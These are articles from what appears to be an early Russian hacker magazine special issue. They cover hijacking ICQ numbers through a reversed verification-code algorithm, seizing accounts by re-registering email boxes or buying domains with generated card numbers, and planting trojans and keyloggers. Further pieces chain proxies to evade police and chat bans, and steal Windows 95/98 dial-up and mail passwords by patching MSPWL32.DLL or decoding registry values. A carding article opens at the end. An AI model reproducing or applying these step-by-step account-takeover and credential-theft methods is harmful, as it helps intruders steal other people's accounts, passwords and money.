Исходя из того, что идентификационный код был шестнадцатеричным, я пришел к выводу, что и юины нужно для наглядности перевести в шестнадцатеричную систему. Учитывая то, что теоретически нумерация юинов начинается с 1001 плюс еще абстрактный юин 1, принадлежащий администрации Мирабилиса, я решил, что для наглядности будет лучше, если я буду перед переводом в шестнадцатеричную систему отнимать от номера число 999. В чем-то мне это помогло. Было действительно немного наглядней. Например, для моего юина 133007 шестнадцатеричное значение составляло 0203A8, а идентификационных кодов выдавалось несколько:


Спецвыпуск хакер, номер #001, стр. 001-058-3, Большому кораблю — большая торпеда

Большому кораблю — большая торпеда

Михаил Ромашов

Спецвыпуск хакер, номер #001, стр. 001-058-3

0 517E2A8 366 7B 05A

1 406F3B9 365 ED C97

2 735C08A 365 ED 9C4 и т.д.

Все эти коды проходили при верификации пользователя. Но я не мог понять алгоритма их генерации, а, стало быть, не мог самостоятельно сгенерировать код для другого юина. Но была и хорошая информация. Последние 8 байт были всего лишь таймером и не влияли на сам код, а кодом были байты со 2 по 8, и первый байт был чем-то вроде ключа. Вот тут мне пришло на выручку дилетантство пользователей. Для того чтобы понять алгоритм генерации кодов, мне нужны были юины, у которых шестнадцатеричное значение составляло бы круглое число. То есть типа A00000, B00000. Такие юины в десятичной системе выглядят весьма абстрактно и не привлекательно. Большинство их пользователей ставило в качестве пароля либо свой ник, либо свое имя, либо имя своей любовницы, короче, информацию о пароле можно было почерпнуть в информации о пользователе. Еще не разобравшись до конца в алгоритме, я все же смог создать код для давно не используемого юина 6666. Моя радость не знала границ, когда мой код прошел, и я смог прописать в primary e-mail свой адрес. Елозя от нетерпения на стуле и проверяя каждые 3 минуты почтовый ящик, я ждал прихода письма с паролем. И тут без какого-либо предупреждения мне отключили аккаунт и почтовый ящик! Не буду уточнять, как и почему это произошло, скажу только, что настолько зол я никогда больше не был.

Ценности уплыли

за границу. Может им

там больше нравится?

В конце концов я все же получил пароль для этого юина и, наверное, стал первым в России счастливым обладателем четырехзначного номера аси. Алгоритм генерации кода в конечном итоге оказался не очень сложен. Например, для кода с первым байтом 0 все было просто элементарно. Берем номер аси хотя бы 123456, переводим его в шестнадцатеричную систему — 1E240, прибавляем к нему число 515DB19 et voila — код 0517BD593667B05A. Теперь осталось прописать свой e-mail и попросить сервер послать по нему письмо с паролем. Когда техническая проблема была разрешена, передо мной встала юридическая. Если с правами на владение юином 6666 было все ясно, т.к. им уже давно не пользовались, то с любым другим было сложнее. Ведь он мог еще и принадлежать кому-то. Возможно, сказалось отсутствие у меня юридического образования, но я так и не смог придумать, как ни напрягался, какой формой собственности является юин. Ни под личную, ни под частную, ни даже под интеллектуальную он не подходил. Затрат на его получение владелец никаких не нес. Стало быть, юридически юин — фикция. К тому же все эти юины уже неоднократно меняли владельца. И все-таки отдельные юины имеют ценность — ценность эстетическую. Ведь, что ни говори, а номер 11111 куда приятнее для глаза, чем, скажем, 6946261.

3 относительно честных способа получения юина

Несмотря на наличие или отсутствие дыр в системе Мирабилиса всегда были и будут существовать другие стандартные методы завладения чужим юином. Например:


Спецвыпуск хакер, номер #001, стр. 001-058-4, Большому кораблю — большая торпеда

Большому кораблю — большая торпеда

Михаил Ромашов

Спецвыпуск хакер, номер #001, стр. 001-058-4

1. Подбор пароля

Очень многие пользователи по каким-либо причинам делают очень легкие пароли. Это либо их ник, либо их имя или фамилия, либо их логин, который является первой частью их e-mail`а, либо какое-то слово, которое можно найти в инфе пользователя, либо простой набор символов, вроде 123456 или qwerty. К тому же существует целая библиотека стандартных паролей.

2. Получение доступа

к почтовому ящику

Это самый обширный и самый распространенный метод, поэтому я разделю его на подвиды. Он используется в случае, если в графе пользователя primary e-mail прописан некий почтовый ящик, по которому можно получить пароль.

А. Повторная регистрация

почтового ящика на сервере

Очень часто в этой графе прописывают почтовый ящик, зарегистрированный на каком-либо сервере, предоставляющем свои услуги бесплатно. Это и www.hotmail.com, и www.yahoo.com, и www.chat.ru. При длительном неиспользовании этого ящика (в течение полугода минимум) запись о нем уничтожается, и он может быть заново зарегистрирован любым другим пользователем. Поэтому если вы увидели такой адрес — первым делом проверьте, существует ли он еще.

Б. Первичная регистрация

почтового ящика

Иногда люди указывают в этой графе адрес абстрактного почтового ящика на сервере, предоставляющем услуги бесплатной почты. То есть ранее этот ящик на данном сервере еще никем не был зарегистрирован, и ничто вам не мешает зарегистрировать его и получить на него пароль.

В. Вскрытие почтового ящика

Этот метод также подразумевает получение доступа к чужому почтовому ящику стандартными средствами, обычно подбором пароля или нахождением дыр в защите сервера, как это было с Хотмейлом или Чат.ру.

Г. Регистрация домена

Самый оригинальный на мой взгляд метод. Многие пользователи любят указывать почтовый ящик на несуществующих серверах. Примером могут служить ящики aaaaa@bbbbb.com. Для получения пароля этой аси вам достаточно, используя любую генерилку кредитных карточек, купить домен www.bbbbb.com и, когда он будет задействован, получить письмо с паролем. Единственное условие: к процессу регистрации домена нужно подходить с умом. Не везде вам позволят купить домен по несуществующей кредитке. Для этого я порекомендовал бы www.awc.net. Зарегистрированный там домен гарантированно просуществует пару недель — достаточный срок для получения письма.

3. Удаленный доступ к компьютеру

Данный метод подразумевает некоторые навыки общения с программами и методами, предоставляющими возможности удаленного доступа к компьютеру, на котором установлена аська с интересующим вас номером. Обычно для этих целей используется троянский конь Back Orifice. Однако им очень трудно производить пересылку файлов, и к тому же он получил слишком широкое распространение и теперь излечивается даже «доктором Вебом». Так что ищите менее распространенный, но не увлекайтесь особенно, ведь вы и сами можете стать его жертвой. Использование удаленного доступа также подразумевает не один способ.


Спецвыпуск хакер, номер #001, стр. 001-058-5, Большому кораблю — большая торпеда

Большому кораблю — большая торпеда

Михаил Ромашов

Спецвыпуск хакер, номер #001, стр. 001-058-5

А. Системные файлы

Вам нужно всего лишь получить системные файлы аськи. А именно: «номер_аси.dat и номер_аси.idx» из каталога «c:\program files\icq\db». Это если ася проинсталлирована в каталог по умолчанию. Остальные файлы для этого юина вы сможете сфабриковать из аналогичных файлов любого другого номера. После этого, корректно изменив информацию в системном реестре, вы сможете сконнектиться под данным номером.

Б. Грабберы

В случае, если пользователь не использует сохранение пароля (снята галочка «Save password» в разделе «Security&Privacy»), то метод А неприменим. В этом случае используются так называемые грабберы клавиатуры — программы, которые незаметно для пользователя пишут в специальный файл все набранные им на клавиатуре символы. Естественно, в этот файл попадет и пароль аси. Пользоваться им весьма просто. Самый распространенный для этих целей граббер — hookdump. Достаточно каким-то образом поместить этот файл на компьютер с нужным вам номером аси и через некоторое время получить результат его деятельности.

Из нестандартных методов существовал также метод с переполнением буфера пароля аси. Специально написанная под юниксовые системы программа Hijack, использующая эту ошибку, позволяла, произведя ввод пароля больше 8 символов, вызвать ошибку сервера и сконнектиться под любым юином. Однако возможности смены информации пользователя и пароля были в ней специально заблокированы.

Все это и кое-что другое вы сможете найти по адресу http://mirabu.da.ru. Данная информация приведена исключительно в общеобразовательных целях.

Соломоны из Мирабилиса и их решения

Но довольно лирики. Если с моим моральным обликом уже все ясно, то описание взаимоотношений Мирабилиса с пользователями достойно отдельной главы.

Помнится мне, были славные времена, когда про Мирабилис мало кто знал и когда они отвечали даже на мои дурацкие запросы «...как расшифровывается ICQ?», тогда Мирабилис еще являлся фирмой, которая предоставляла некие услуги и поддерживала пользователей. Теперь это не больше чем мифическое чудовище, укрывшееся за непробиваемой стеной почтовых роботов, творящих отписки с производительностью советских бюрократов. Поговорить с кем-то из сотрудников все равно что взывать к богу — в лучшем случае получите от автоматического служителя культа стандартное: «Молитесь и воздастся». Когда я впервые потерял пароли от своих асек и обнаружил, что не могу узнать новые, так как снесена запись о моем почтовом ящике — я стал долбиться в закрытые двери technical support. То, что они закрыты и замурованы, я узнал позднее. Сначала я был полон оптимизма несмотря на полученные на мой запрос от почтового робота Мирабилис сочувствия по поводу утери пароля и рекомендацию завести новый номер. Мой энтузиазм начал спадать, когда я понял, что обнаруженные мною служебные юины технической поддержки пользователей аси — 70000 и 80000 скорее всего так и не выйдут в онлайн, чтобы разрешить мою проблему. Последней моей надеждой был телефонный номер Мирабилиса в Израиле, но и тут меня ждал полновесный «облом» в лице автоответчика, жизнерадостно объявившего женским голосом, что я таки да смог дозвониться в службу технической поддержки Мирабилиса. В дальнейшем я неоднократно убеждался в том, что Мирабилис самоустранился от решения проблем пользователей, предоставив им вариться в котле проблем самим и выбираться из него собственными силами. Убедился я и в том, что они достаточно решительно расправляются со своими проблемами, игнорируя при этом права других. Иногда решения сотрудников Мирабилиса чрезвычайно радикальны. Весьма показателен процесс перехода юина 123456 из рук в руки. Когда бразильский хакер Wax все-таки достал Мирабилис воплями о том, что у него похитили его любимый юин, то админ фирмы, недолго думая, просто захватил этот номер в свои руки и, видя, что не может его удержать, снес запись о нем с сервера. Та же участь постигла юины 12345 и 101012. Никаких потуг вернуть его истинному владельцу с их стороны не было. Более того. В одностороннем порядки, несмотря на протесты как минимум 3 действующих пользователей, были уничтожены все 4-х значные юины. Так что цезарю — цезарево, а божье — богу. В отношении наших юинов Мирабилис — высшее существо, позволяющее себе все.


Спецвыпуск хакер, номер #001, стр. 001-058-6, Большому кораблю — большая торпеда

Большому кораблю — большая торпеда

Михаил Ромашов

Спецвыпуск хакер, номер #001, стр. 001-058-6

Эпилог

В конечном итоге и дурак поймет, что на грабли наступать не стоит. Поняли свою ошибку и программисты Мирабилиса. Поняли после того как в Россию перетекло порядка 4-х десятков различных юинов. Поняли и заткнули дыру. Теперь выданный при заходе на страницу с пользовательской информацией код запоминается сервером, и все изменения принимаются по нему только однажды. Он также не зависит от пароля, но не менее надежен. Все это не говорит, что наши аси теперь в безопасности. Перечисленные выше стандартные методы не потеряли своей силы. И наши аси так и не будут в безопасности, пока Мирабилисовским «гениям» ни стукнет в голову, что информацию о пользователе (особенно primary e-mail) нужно защитить отдельным паролем, и тогда, даже если пароль на коннект у вас сменится по какой-то причине, то мыло-то ваше все равно останется на месте, и вы сможете получить по нему новый пароль. А пока я могу вам посоветовать только три способа защитить свой юин:

1. Используйте абстрактный пароль максимальной длины желательно русскими буквами (они могут использоваться в пароле наряду с латинскими). А также совмещайте в пароле буквы и цифры. Поверьте, пароль «alex» намного легче подобрать, чем «njg3423s».

2. Уберите галочку в пункте «Save password» и поставьте уровень секретности «medium»

3. Уберите primary e-mail или поставьте туда e-mail express pager другой вашей, но не используемой вами аси.

Можно еще порекомендовать почаще менять пароль, но это тоже чревато последствиями. Вы ведь и забыть его можете! И упаси вас боже пользоваться программами непонятного назначения и происхождения.

Вот, в общем-то, и все. Have a nice day :-)


Спецвыпуск хакер, номер #001, стр. 001-061-1, НЕИЗВЕСТНОСТЬ — мой адрес,

НЕИЗВЕСТНОСТЬ — мой адрес,

АНОНИМНОСТЬ— мое имя

Спецвыпуск хакер, номер #001, стр. 001-061-1

KurT (2950197@Iname.com) and DoC (serguei@earthling.net)

Если ты помнишь недавнюю историю с неким «хакером», который получил 5 лет условно, то наверное знаешь, каким образом он попался. Этот самый «хакер» занимался кардингом (читай X №1), и все было бы хорошо, но это чудо в перьях даже не позаботилось о своей безопасности, наивно полагая, что, используя Proxy сервер своего провайдера, он обезопасит себя от всех спецслужб. Общеизвестен тот ФАКт, что любой PROXY сервер ведет логи всех действий, совершаемых пользователем. И если вдруг у спецслужб возникнут подозрения в том, что ты совершал неправомерные действия (ну и формулировочки у них!), то они имеют право запросить у провайдера всю информацию о тебе и твоих перемещениях в Сети. Вот тут-то тебя и схватят. :) И не надо думать, что ты крутой, что IP еще ничего не говорит. Все он говорит, даже твой домашний адрес.

Part 1. Как скрыть свой реальный IP-адрес?

Все прокси серверы делятся на две большие группы: это transparent (прозрачные) и no transparent (не прозрачные).

Если ты используешь Transparent сервер, то не надейся на то, что твой реальный IP-адрес никто не раскроет! При запросе такой Proxy cервер выдаст всю необходимую информацию о тебе. И считай, что твоя любимая девушка из чата уже знает, что на самом деле ты — некрофил из Южной Африки. А вот при использовании no transparent PROXY твой реальный IP- адрес врагу узнать не удастся! И он будет наивно полагать, что ты находишься черт знает где, то есть будет видеть лишь физическое положение самого Proxy сервера, но не тебя.

Если ты не уверен в том, что тебя может спасти один анонимный прокси сервер, то можешь использовать последовательность проксей: http://www.pentagon.gov/" target="_top">http://proxy2:port/http://www.pentagon.gov/" target="_top">http://proxy1:port/http://www.pentagon.gov/" target="_top">http://proxy2:port/http://www.pentagon.gov/ (учти, что не все прокси могут работать таким образом). В этом случае ты связываешься с нужным хостом, проходя через целую цепочку проки серверов. И если все они no transparent, то отследить тебя будет практически невозможно. Очень удобно для чатов и досок объявлений. :)

В случае с чатом твоя легенда будет зависеть от выбранного Proxy сервера. А то часто зайдет какой-нибудь крендель с финским IP-шником и начинает рассказывать, как у него тут жарко, да еще к тому же и носороги по улицам ходить мешают и в море акул немеренно. Все в недоумении. Но знающие люди сразу просекают, что этот баклан через прокси залез. В общем, сам себя сдал. :)

Part 2. Как ускорить

получение информации

в Интернет

На PROXY серверах хранится большое количество динамически изменяющейся информации с серверов Интернет — это страницы, графика, файлы и т.п. Если ты зашел через прокси, залез на сайт с порнухой, насмотрелся картинок, а после тебя кто-нибудь другой из пользователей PROXY сервера полез на этот же сайт, то второму человеку повезло. Прокси сервер кеширует все, что через него проходит, динамически обновляя свой кеш. Следовательно, второй юзер будет тащить все картинки уже с самого прокси сервера, а не с настоящего сайта, а значит, он получит более быстрый доступ к страницам. Но на этом все прелести и возможности использования proxy серверов не кончаются ....


Спецвыпуск хакер, номер #001, стр. 001-061-2, НЕИЗВЕСТНОСТЬ — мой адрес,

НЕИЗВЕСТНОСТЬ — мой адрес,

АНОНИМНОСТЬ— мое имя

Спецвыпуск хакер, номер #001, стр. 001-061-2

Part 3. Как довести до инфаркта АДМИНА чата

Прошли те времена, когда www-чат был в диковинку. Когда-то там можно было творить все, что угодно! Использовать HTML теги, писать ОГРОМЕННЫМИ буквами и делать другие гадости назло всем. Но самая хорошая вещь www-чатов жива и поныне. Если тебя выкинули из чата без права повторного входа, то тут лучше всего поможет смена PROXY сервера в настройках твоего браузера. Как только ты сменил себе прокси, то сможешь заново зайти в чат, и до того как тебя оттуда опять выкинет разьяренный админ, ты успеешь выругаться матом с применением HTML Тегов :-)

Проверить свой прокси на предмет его полной анонимности можно тут: http://www.tamos.com/bin/proxy.cgi

Если ты увидишь сообщение «Proxy server is detected!» — то это значит, что твой прокси не имеет защиты и тебе будет предоставлена информация о твоем реальном IP адресе, как, впрочем, и об IP адресе прокси сервера, который ты используешь. Если же сообщение гласит: «Proxy server is not detected» — то все в порядке!

Part 4. Как весь этот ужас настроить

В меню Edit выбери Preferences. В закладке Proxies выбери Manual Proxy Configuration и нажми на кнопку View. Проставь необходимый тебе прокси сервер и его порт (см. таблицу).

В меню View выбери Internet Options, далее закладку Connection, в разделе Proxy Server пометь Connect using a proxy server (подключение через прокси сервер), впиши имя прокси сервера и порт.

Дополнительная

информация:

http://www.bikkel.com/~proxy/public.html —

Публичные Анониминайзеры.

http://www.bikkel.com/~proxy/proxy.html — БОЛЬШОЙ список всевозможных

прокси серверов.

Таблица 1. Proxy сервера со скрытием реального IP-адреса (no transparent)

Proxy сервер Порт

proxy.mcmail.com 8080

proxy.co.rmit.edu.au 8080

gateway.kwantlen.bc.ca 80

sakura.my-pharm.ac.jp 8080

ns1.san.rr.com 8080

prefetch-atm.midsouth.rr.com 8080

infosun-fd.rus.uni-stuttgart.de 8080

proxy.co.rmit.edu.au 8080

linux.softec.es 8080

magicall2.dacom.co.kr 8080

proxy1.jaring.my 3128

sunsite.icm.edu.pl 8080

proxy.qatar.net.qa 8080

proxy1.turnet.net.tr 8080

Таблица 2. Обычные Proxy сервера с с показом реального IP (transparent)

Proxy сервер Порт

Cache.connect.ab.ca 3128

Cache.sh.cvut.cz 3128

Server.librarysafe.com 81

Proxy.silcom.com 3128

Cache2.nlanr.pa-x.dec.com 3128

Cache.vossnet.de 3128

Pluto.nienburg-weser.de 8080

Otsun1f.dss.dornier.dasa.de 3128

dos2.esegi.es 3128

www-cache.kolumbus.fi 8080

Proxy.spidernet.it 8080

Sama.isc.kyutech.ac.jp 8080

Proxy.kren.nm.kr 8080

Proxy.intnet.mu 8080


Спецвыпуск хакер, номер #001, стр. 001-062-1, Береги password смолоду!

Береги password смолоду!

SolariZer

Спецвыпуск хакер, номер #001, стр. 001-062-1

Во все времена были люди, которые старались что-либо утаить от других. Но были и другие: те, которые с этим были не согласны и всячески старались тайны первых узнать. И вот придумали первые вход в Интернет с паролем, ибо денег сие удовольствие стоит, а вторые сразу начали этот пароль отыскивать всеми возможными и невозможными способами.

Когда-то давно пароль пользователь мог выбирать сам. С одной стороны, это было очень удобно: если сам слово заветное это придумал, то уж не забудешь никогда (если только пребывал в этот момент в здравом уме и твердой памяти, но это уже к делу не относится). Пароль же выбирался не просто так: для указанного индивидуума он, чаще всего, нес определенную смысловую нагрузку. И было в этом слабое место данного метода. Теперь только в дешевых фильмах можно увидеть некоего гражданина, копающегося в мусорной корзине своей жертвы в надежде узнать имена, фамилии, даты рождения всех родственников таковой вплоть до десятого колена, а также клички всех их собак, кошек, крыс, хомяков и тараканов. А как же еще: что тебе, например, первым приходит на ум? Конечно: имя твоей (а чаще не твоей) подружки или кличка замученного домашнего животного, ну или слово какое непотребное. Наиболее продвинутые хакеры начали составлять специальные словари с учетом наиболее часто встречающихся в паролях слов.

Все это, в конце концов, положило конец первой стадии и началась вторая: теперь компьютер генерирует некоторую псевдослучайную последовательность букв, цифр и разных знаков препинания. Хорошо-то как стало: «Lta13?Lp» — попробуй подбери! Но тут возникла другая проблема: а попробуй-ка запомни! Пользователи наши начали их на бумажках записывать, ну и периодически... правильно: бумажки терялись, похищались, попадали в мусорную корзину и т.д. — от чего ушли, к тому и пришли! И тогда какая-то умная голова догадалась, что пароль можно хранить не в голове, а прямо на жестком диске. В DialUp-окне галочку поставить и запомнить пароль. У компьютера мозги кремниевые — ему все равно, что запоминать. Ну, а раз запомнили, то, само собой, и записать надо. Ну, а раз записать, то... правильно: отвернулся наш пользователь, а тут толпа голодных до Инета хакеров налетела — и пароль подсмотрела... И тогда пароли стали шифровать.

Ну вот, наше вступление закончилось.

Интимные подробности

Где же хранятся пароли в Windows 95/98? Известно где, зашифрованные пароли в Windows 95/98 хранятся в основном каталоге, в файлах с расширением PWL. С учетом того, что не только «у нас здесь», но и «у них там» бывают персональные компьютеры коллективного пользования, да и сети локальные местами встречаются (правда, редко), на каждого пользователя заводится свой PWL. Кстати, название файла соответствует логину данного юзверя. Эти файлы, в принципе, зашифрованы достаточно прилично. Если кому-либо интересно, то, взяв в руки какой-нибудь дизассемблер (HIEW, QVIEW), можно посмотреть процедуру шифрования. Она находится в файле MSPWL32.DLL. Там все очень накручено. Имеется счетчик (назовем его N) от нуля до «сколько надо». Имеются три таблицы. В соответствии со счетчиком N берется байт из первой таблицы (X). По смещению X+N, урезанному до 8 бит, из второй таблицы берется другой байт (Y). Затем по адресу X+Y, опять же урезанному до 8 бит, из третьей таблицы берется третий байт (Z). После столь хитрых манипуляций командой XOR с байтом Z шифруется байт информации, после чего счетчик инкрементируется, и все повторяется сначала (как тебе, а?). Как формируются сами таблицы? Не знаю (мне было лень выяснять). Расшифровывается все это аналогично (той же процедурой), ибо команда XOR обратима. То, какие Винды у тебя стоят — значения не меняет. Не знаю уж, в чьих нездоровых мозгах могла появиться мысль использовать для шифрования команду xor byte ptr [eax+ebp],cl. Может, запутать хотели? Но команда уникальна, такие команды в обычных программах еще поискать надо. Стало быть, ищем соответствующую ей комбинацию 30h, 0Ch, 28h — и все дела. Дальше — просто. Берем MSPWL32.DLL и, со смещения 511h (или там, где найдем), ставим 90h, 90h, 90h — команды NOP (пустая операция). И все, команда не выполняется! Что при этом произойдет? Да ничего! Ничего страшного и даже не очень страшного. И даже никто ничего не заметит!!! Все останется как всегда, с одним лишь исключением: ВСЕ логины/пароли будут ВИДНЫ, так сказать, невооруженным глазом! Тут, правда, есть два неприятных момента. Во-первых, во время работы Windows не удастся подобным образом надругаться над их «святая святых»: писать в этот файл нельзя. Значит, придется перегружаться в режиме эмуляции MS-DOS, а это лишнее время, которого может не быть. Во-вторых, надо будет стереть ВСЕ PWL’ы, иначе даже в Windows не пустят: а вот тут у законных пользователей могут возникнуть лишние вопросы и подозрения.


Спецвыпуск хакер, номер #001, стр. 001-062-2, Береги password смолоду!

Береги password смолоду!

SolariZer

Спецвыпуск хакер, номер #001, стр. 001-062-2

«Все это, конечно, хорошо, но я ни хрена не понял, можно ли попроще? Без дизассемблеров и т.д.?» — гневно возразишь ты. Можно! И вот здесь я скажу то, за что многие «не любят» Windows. Ты, наверное, думаешь, что пароли расшифровываются только тогда, когда это надо, а затем удаляются из памяти? Ну вот еще... Открытые пароли ПОСТОЯННО хранятся в системе — с момента ВХОДА пользователя в Windows и до момента его ВЫХОДА! Во какая безопасность. Но и этого мало: они доступны ЛЮБЫМ приложениям через Windows’совский API. И вот результат: появляется программа PWLVIEW, которая спокойненько тебе показывает «все самое интимное» твоей (или не твоей) машины. В том числе и Dial Up, и сетевые пароли. Формат выдаваемой информации таков:

*Rna\1-е соединение\1-й логин 1-й пароль

*Rna\2-е соединение\2-й логин 2-й пароль и так далее. Это все очень круто, но она работает в окне DOS, это же... унизительно: мелкий шрифт, белым по черному... А нет ли еще чего-нибудь, ближе и роднее «настоящему» хакеру? Конечно, есть. Есть еще одна штука, PEEPER называется. Эта идет еще дальше. Пароль, как ты можешь заметить, не показывается, вместо него звездочки. Так вот: запускаем PEEPER, открываем соединение, наводим мышь на звездочки и в окне PEEPER видим... открытый пароль. «У меня нет ни времени, ни возможности ковыряться в чужой машине. Нельзя ли скопировать у другана этот самый PWL, а потом, дома, разобрать?» — законно спросишь ты. Можно, только это тебе, дружище, ничего не даст: не будет он у тебя работать, хоть ты тресни. Вернее, он ОДИН не будет. Нужно еще и USER.DAT утащить. После чего дома «создать» User’а с именем из PWL, заменить свой USER.DAT на свежестянутый и еще добавить в Windows стянутый PWL. После чего войти в Windows под соответствующим именем и... Дальше в игру вступает PWLVIEW.


Спецвыпуск хакер, номер #001, стр. 001-062-3, Береги password смолоду!

Береги password смолоду!

SolariZer

Спецвыпуск хакер, номер #001, стр. 001-062-3

Я все так и сделал, скажешь ты, а вот тот юзер в Windows с паролем входил, а мне теперь не войти — пароля-то я не знаю. Есть способ проще! Вся основная информация ТОЛЬКО в USER.DAT! А теперь: Windows 95 — M. D.! Как тебе должно быть известно, кроме интерактивного доступа в Интернет, провайдеры еще и e-mail впаривают суповым набором. Так вот, чтобы залезть в твой почтовый ящик, в тот, что у тебя в подъезде, нужен ключ (или лом). Чтобы залезть в твой e-mail, нужен пароль (или виртуальный лом). И тут я скажу: ВСЕ ПОГОЛОВНО провайдеры в славном городе Москве — M. D.! Пароль к POP3-ящику всегда тот же, что и DialUp! Ну и что? А вот что. Пароль e-mail находится не в PWL’е, а в USER.DAT, и зашифрован он не так сильно, вернее, почти совсем не зашифрован! А это как??? Да вот так! Метод «шифрования» напоминает элементарное UUE-кодирование, иначе говоря, из трех байтов делают четыре или из 8 битов — 10. Весь исходный пароль разбивается на части по три байта. В результирующей строке на один символ отводится 10 битов. Теперь: к каждому байту исходной строки прибавляется 30h, если сумма больше, чем 7Ah, то он становится равен 30h, а к паре 9 и 10 битов добавляется единица. Однако есть исключения. Если общая длина строки пароля не кратна трем, то она дополняется байтами 3Dh. Судя по всему, это 0Dh (конец строки)+30h. В конце строки 0Dh, 0Ah: стандартное завершение. На мой взгляд, подобрать пароль вручную проще, чем написать соответствующую программу: не каждый же день ты эти пароли подбираешь! Где находится пароль — написано ниже, оттуда его и берут. А принцип прост. В Internet Mail, заходим в Сообщение & reg; Параметры/Сервер. Запускаем REGEDIT, переходим в HKEY_CURRENT_USER/Software/Microsoft /InternetMail and News/Mail/POP3/»Твой сервер»: смотрим Password. Удаляем пароль в Internet Mail. Первый подбираемый символ влияет на первый и второй байты, второй — на второй и третий, третий — на третий и четвертый. Теперь: подбираем символ так, чтобы первый байт совпал с оригиналом, а второй или совпал, или был самый большой, но меньше оригинала. Аналогично для второго и третьего символов. С подбором третьего символа все четыре байта должны совпасть! Если нет — извини, no sex for you. Естественно, после каждой замены символа жми «Применить». Результат контролируем REGEDIT’ом, переходя вверх/вниз для обновления информации. Когда первые три символа подобраны, возвращаемся к (*) для следующих трех и т.д. до победного конца. Разумеется, байт(ы) 3Dh подбирать не нужно! После некоторой тренировки на все это уходит минут 15.


Спецвыпуск хакер, номер #001, стр. 001-062-4, Береги password смолоду!

Береги password смолоду!

SolariZer

Спецвыпуск хакер, номер #001, стр. 001-062-4

Где же это счастье хранится? И, вообще, кроме логина и пароля еще многое нужно знать, а откуда, не звонить же провайдеру? Не надо никому звонить! Все в нем, в USER.DAT.

HKEY_CURRENT_USER/RemoteAccess/Addresses: и мы имеем список подключений. Да, но там ничего не видно, цифры какие-то... А ты чего хотел, дружок! Выбираем байт, которого больше всего, и дешифруем им все остальные (обычный XOR). В результате в куче всякой ерунды получаем ASCII-строку с номером модемного телефона провайдера (потеть, конечно, придется, если друг совсем не знакомый или работает партизаном, а знакомого и спросить можно — типа: «Что это за провайдер у тебя такой не хилый, друг ты мой лучший, Миша»?).

HKEY_CURRENT_USER/RemoteAccess/Profile/«подключение»/IP: со смещения 0Ch четыре байта задом наперед — это первичный DNS, затем еще четыре — вторичный и т.д.

HKEY_CURRENT_USER/RemoteAccess/Profile/»подключение»/User: логин.

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/InternetSettings/ProxyServer: Proxy-сервер и порт.

HKEY_CURRENT_USER/Software/Microsoft/InternetMail and News/Mail:

DefaultPOP3Server:

DefaultSMTPServer:

SenderEMail:

Name:

Organization: это все и так понятно.

POP3 — «POP3-сервер»:

Account: это понятно.

Password: ну вот и он, родимый.

Что делать, если пользователь — мазохист? Не хранит он пароль в компьютере, а вводит его каждый раз с клавиатуры? Существуют программы типа SPYWIN или HOOKDUMP или KEYWITNESS. Они записывают все действия, производимые на компьютере. Достаточно подсадить одну из них и все... Естественно, их можно использовать и для других не менее интересных целей.

И в конце могу тебе посоветовать: не качай и уж тем более не запускай у себя всякие «взломщики Интернета». Они могут крякнуть только информацию на твоем винчестере! Ибо тот, кто может взломать провайдера, никогда не будет опускаться до таких мелочей, а другие в лучшем случае хотят над тобой просто посмеяться, в худшем — сделать бяку.

При подготовке статьи использовались сведения, опубликованные в журнале «Windows NT».

Все изложенное ниже предназначено только для ознакомления с возможной опасностью и ни в коем случае не должно быть использовано, если это причинит ущерб каким-либо физическим или юридическим лицам. Это может повлечь за собой административную или уголовную ответственность в соответствии с действующим законодательством.


Спецвыпуск хакер, номер #001, стр. 001-064-1, Что такое кардинг? И сколько за него дают

Что такое кардинг? И сколько за него дают

Иван Говнов

Спецвыпуск хакер, номер #001, стр. 001-064-1

Много, много говорилось у нас о кардинге. А если взять Интернет, то там вообще каждый человек, сгенеривший себе номер кредитки, уже считает себя кардером. На самом деле, кардинг, это скорее наука, со своей спецификой, постоянными открытиями, построенная на изучении платежных систем разных государств. В этой статье мы попытаемся описать некоторые случаи мошенничества с расчетными (a.k.a. кредитными, пластиковыми) картами, специфические именно для России. Цель статьи — конечно же, сугубо профилактическая, показать, как несовершенны и небезопасны расчеты с использованием карт.

Для начала назовем вещи своими именами: воровство есть воровство и, как все воровство, — уголовно наказуемое. И хоть кража с использованием компьютера совсем не то же, что кража кошелька из сумки в магазине, нужно помнить, что это присвоение чужого, а, соответственно, при проигрыше в этой игре «кто умнее, милиция или я», тебя ждет тюрьма.

Первое, что говорят любые грамотные хакеры — нужно по возможности лучше разбираться в технологии функционирования платежной системы, использующей расчетные карты.

Немного истории. Почему возникли расчетные карты? Потому что людям удобно не ходить с крупной суммой денег, а использовать некий инструмент, позволяющий снимать со счета именно ту сумму, которую хочется потратить. Кроме того, уменьшится привлекательность грабежей: чужой картой воспользоваться трудно, так как ее блокируют по первому же звонку потерпевшего.

Немного технологии. Что происходит, когда ты совершаешь покупку по карте? Сначала продавец регистрирует параметры карты (номер, срок действия, иногда сверяет имя на карте с документом). Затем он обращается в центр обработки карт (так называемый процессинговый центр) за так называемой авторизацией транзакции. Как это выглядит: продавец сообщает, что он собирается совершить по данной карте транзакцию на сумму, скажем, $475. В ответ он либо получает так называемую авторизацию, либо отказ (возможны и другие варианты развития событий — например, приказ изъять карту). В данном случае авторизация — это просто число. Продавец регистрирует это число, и для него оно — гарантия того, что деньги он получит несмотря ни на что. При этом (почти всегда) требуемая сумма считается уже потраченной тобой, даже если ты вдруг решишь не совершать эту покупку. То есть эти деньги будут на твоем счету заморожены. Только в конце расчетного периода (обычно — 30 дней) ты снова сможешь распоряжаться этой суммой. Обращение в центр обработки карт может быть самым разнообразным — касса может сделать все сама или продавец может позвонить туда голосом. Это два крайних случая, возможно множество промежуточных вариантов. Все вышесказанное справедливо как для покупки по карте «живьем», так и для покупки через internet или по телефону/факсу. Подытожим. Важно понимать следующее:

1. Продавец обращается не в банк, выдавший карту, а в местный центр обработки карт. Банк, выдавший карту, может быть хоть в Парагвае. Центр обработки находится, как правило, в одном из местных банков.


Спецвыпуск хакер, номер #001, стр. 001-064-2, Что такое кардинг? И сколько за него дают

Что такое кардинг? И сколько за него дают

Иван Говнов

Спецвыпуск хакер, номер #001, стр. 001-064-2

2. Продавец не может узнать, сколько денег у тебя на счету. Он даже не может узнать, есть ли у тебя нужная ему сумма. Все, что он может, это попытаться получить авторизацию на нее.

3. Если продавец получил авторизацию на требуемую сумму, эта сумма на карточном счету замораживается. В случае легального использования карты это всего лишь мелкая неприятность, но становится проблемой при нелегальном использовании карты — уменьшается сумма, которую можно потратить, потому что аннулировать авторизацию — большой геморрой, и продавцы редко соглашаются это делать.

